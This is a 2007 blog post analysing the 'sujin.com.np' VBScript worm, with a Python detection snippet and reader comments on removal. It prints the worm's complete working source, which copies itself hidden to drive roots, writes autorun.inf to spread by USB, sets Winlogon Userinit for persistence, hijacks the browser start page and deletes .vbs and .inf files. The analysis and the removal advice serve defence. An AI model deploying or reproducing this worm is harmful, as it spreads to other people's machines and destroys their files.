Wednesday, December 5, 2007

‘sujin.com.np’ virus or what?

It was just today that I noticed that whenever I opened my Internet Explorer, the title of my browser showed ‘sujin.com.np’ and my home page had been changed to sujin.com.np. I was scared for a moment. What could have happened? Did someone hack into my Explorer and steal my private data? I have the free edition of AVG installed and I update it regularly, but it couldn’t detect the so-called ‘sujin.com.np’ virus.
Anyway, I knew that the only thing that could solve my problem was the internet, and as I predicted I found many solutions. Actually, this might have got into my computer through someone’s flash drive or something. It was just a script programmed by some guy from Nepal in Visual Basic (VBScript) that changed some registry settings and copied itself to the root directory of every drive.
The VBS file in notepad looked like this:

'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'******************************************************************
'******************************************************************
'Program developed by
'Sujin Joshi
'http://Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root

Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop


Count=Drv.DriveType

Do
If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

' Browser branding: IE window title and start page
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://sujin.com.np/"
' Persistence: Winlogon Userinit is made to start the dropped script at every logon
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
For Each files In folder.Files
auto=Left(files.Name,7)
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
Next
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1

sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub


A post on boyutal’s blog says that it’s just a harmless VBScript file installed on your computer which just:

1.) Modifies registry settings to do tasks such as disabling access to the Taskbar, setting the Start Page of Internet Explorer to "sujin.com.np", and modifying the UserInit setting to execute VirusRemoval.vbs

2.) Stores a copy of itself in the root directory of all drives.

3.) Removes all .vbs files in the Windows directory and the root directory, and all .inf files in the root directories of drives.

4.) Removes ravmon.exe, sxs.exe, winfile.exe and run.wsh (maybe these are the files of some malware that its author wants to remove).

5.) Stores VirusRemoval.vbs in the root and adds an autorun.inf to make sure that it auto-executes if it’s installed on a removable disk (i.e. flash drives).

And that’s it... it’s harmless..

I don’t know, I still think there is something fishy about this.
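Two of the artefacts listed above are easy to check for without running anything: the Winlogon Userinit value (which the script extends to launch VirusRemoval.vbs) and the autorun.inf it writes to drive roots. The following is an added example, not code from the post or from the script’s author; the registry value and autorun.inf text are constructed samples shaped like what the script on this page writes, and you would feed it the real values exported from a machine.

```python
import configparser
import ntpath

# File name the script on the page drops (lower-cased for matching).
DROPPED_FILES = ("virusremoval.vbs",)

# Constructed samples mirroring what the script writes; not captured from a real machine.
CLEAN_USERINIT = r"C:\WINDOWS\system32\userinit.exe,"
INFECTED_USERINIT = (r"C:\WINDOWS\system32\userinit.exe,"
                     r"C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\VirusRemoval.vbs")
SAMPLE_AUTORUN = r"""[autorun]
open=wscript.exe VirusRemoval.vbs
shell\open=Open
shell\open\Command=wscript.exe VirusRemoval.vbs
"""


def userinit_extra_programs(value: str) -> list:
    """Programs in a Winlogon Userinit value other than userinit.exe itself."""
    # Userinit is a comma-separated list of programs started at logon; a clean
    # value names only userinit.exe (normally with a trailing comma).
    extras = []
    for entry in value.split(","):
        entry = entry.strip()
        if not entry:
            continue
        exe = ntpath.basename(entry.split(" ", 1)[0]).lower()  # drop arguments
        if exe != "userinit.exe":
            extras.append(entry)
    return extras


def autorun_launch_targets(text: str) -> list:
    """Commands an autorun.inf would execute: the open= and shell\\...\\command= keys."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text)
    section = next((s for s in parser.sections() if s.lower() == "autorun"), None)
    if section is None:
        return []
    targets = []
    for key, val in parser.items(section):  # configparser lower-cases key names
        if key == "open" or (key.startswith("shell\\") and key.endswith("\\command")):
            targets.append(val.strip())
    return targets


def launches_dropped_file(command: str) -> bool:
    """True if a launch command names a file the script drops, e.g. VirusRemoval.vbs."""
    return any(name in command.lower() for name in DROPPED_FILES)
```

Any entry returned by userinit_extra_programs is a logon persistence item and, as the first comment below notes, the fix is to restore Userinit to userinit.exe alone; an autorun.inf whose launch targets point at a script in the drive root is the removable-media spreading mechanism.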


3 comments:

Nasir Sarker said...

This loads automatically from:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Userinit value

You'll see VirusRemoval.vbs is loaded with wscript.

Change it to its default value:
Userinit=userinit.exe

OR

You'll get a cleaner from here:
http://www.baayu.com.np/download/index.php

thx & regds...Nasir

Anonymous said...

Well, I too am facing the same problem.. and I'm not able to change its script to its default value.. How to do that??

Unknown said...

I have posted its solution in this blog too...
http://www.craze4tech.com/2007/12/solutions-for-sujincomnp-virus.html

Check the above post and download the scanner.